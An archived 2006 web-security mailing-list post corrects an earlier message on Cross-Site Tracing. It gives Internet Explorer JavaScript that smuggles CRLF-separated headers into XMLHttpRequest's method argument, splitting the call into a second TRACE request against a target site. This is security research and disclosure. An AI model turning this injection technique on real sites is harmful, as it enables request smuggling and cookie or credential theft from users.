WebApp Sec mailing list archives
ERRATA: Re: [WEB SECURITY] XST
From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Tue, 21 Mar 2006 16:25:20 +0200
Well, you can try the technique I dubbed "HTTP Request splitting", see "Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more..." by yours truly, http://www.webappsec.org/lists/websecurity/archive/2005-09/msg00019.html Try something like this: var x = new ActiveXObject("Microsoft.XMLHTTP"); x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:", "/",false);
I should've taken care of the connection persistence... Please use (note the addition of the "Connection: Keep-Alive" header): x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\nConnection:\t Keep- Alive\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:","/",false);
x.send();
[...] -Amit ------------------------------------------------------------------------- This List Sponsored by: SpiDynamics ALERT: "How A Hacker Launches A Web Application Attack!" Step-by-Step - SPI Dynamics White Paper Learn how to defend against Web Application Attacks with real-world examples of recent hacking methods such as: SQL Injection, Cross Site Scripting and Parameter Manipulation https://download.spidynamics.com/1/ad/web.asp?Campaign_ID=701300000003gRl --------------------------------------------------------------------------
Current thread:
- ERRATA: Re: [WEB SECURITY] XST Amit Klein (AKsecurity) (Mar 21)